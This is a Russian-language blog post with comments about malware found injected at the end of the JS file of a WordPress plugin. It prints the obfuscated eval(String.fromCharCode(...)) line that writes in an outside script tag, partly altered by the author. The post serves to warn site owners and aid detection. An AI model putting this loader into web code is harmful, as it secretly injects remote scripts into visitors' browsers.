Очередной вирус
В очередной раз обнаружил на сайте вирус, связанный с доменом http://o0e.ru/.
В файл плагина Q2W3 Fixed Widget в файле /wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js в конце был дописан код:
eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 115, 99, 114, 34, 43, 34, 105, 112, 116, 32, 115, 114, 99, 61, 47, 34, 43, 34, 47, 118, 34, 43, 34, 107, 46, 99, 34, 43, 34, 99, 62, 34, 41))
Часть кода я изменил, так как
Сервис virusdie.ru его не распознавал.
Самое главное в этом то, что обнаружил этот вирус после того, как перевел сайт на https, браузер помечал сайт как незащищенный и выдал скрипты, которые подгружаются не через https.
Вывод: переводим потихоньку сайты на https.
20 Сен, 2016
seoonly.ru
20 сентября 2016Руки поотрывать тем, кто заражает((
Иван
22 сентября 2016У меня версия плагина 5.0.3. Таких строчек кода в плагине не обнаружил
Archil
22 сентября 2016Да, дело не в самом плагине, туда вшили этот код. Я вот никак не могу определить как оно туда попадает.
Александр
4 февраля 2017Ещё вирусов не хватал на свой сайт, но тема очень актуальная. Возьму этот сервис себе на вооружение. 🙂